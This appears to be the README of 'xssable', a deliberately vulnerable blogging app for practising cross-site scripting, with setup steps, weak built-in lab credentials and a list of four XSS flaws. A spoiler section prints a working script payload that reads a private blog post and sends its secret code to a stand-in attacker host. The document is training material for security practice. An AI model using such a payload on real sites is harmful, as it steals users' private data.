xssable is a vulnerable blogging platform used to demonstrate XSS vulnerabilities.
To run it locally:
docker build . -t xssable:latest
docker run -p 5000:5000 xssable:latest
or
pip install -r requirements.txt
python app.pyThen access the application on http://127.0.0.1:5000.
Spoiler!
Credentials for the built-in user accounts are John:12345 and Connie:iloveyou1.
Currently there are 4 different XSS vulnerabilities:
- a reflected XSS (with the possibility to bypass Chrome's XSS Auditor),
- a stored XSS with limited exploitation,
- a stored XSS without limitations, and
- a
location.hashto.innerHTMLbased DOM XSS.
Exploitation (beyond alert() pop-ups) can be practiced by getting access to Connie's private blog post and stealing the secret code.
Spoiler!
fetch('/blogs').then(r => r.text()).then(t => fetch('https://attacker.kiwi.com/?s='%2bt.split('%F0%9F%94%92')[1].split('<strong>')[1].split('<')[0]))</script>The application highlights that:
- blacklists are bypass-able,
- browser protections are unreliable,
- not every "XSS" has the same impact,
- frameworks do unexpected stuff, and
- server-side validation is important.
- https://xss-game.appspot.com/ - good for basics, created by Google.
- https://knock.xss.moe - focused on exploitation and filter evasion.
- https://polyglot.innerht.ml/ - an awesome polyglot challenge (it's over by now and the results are public).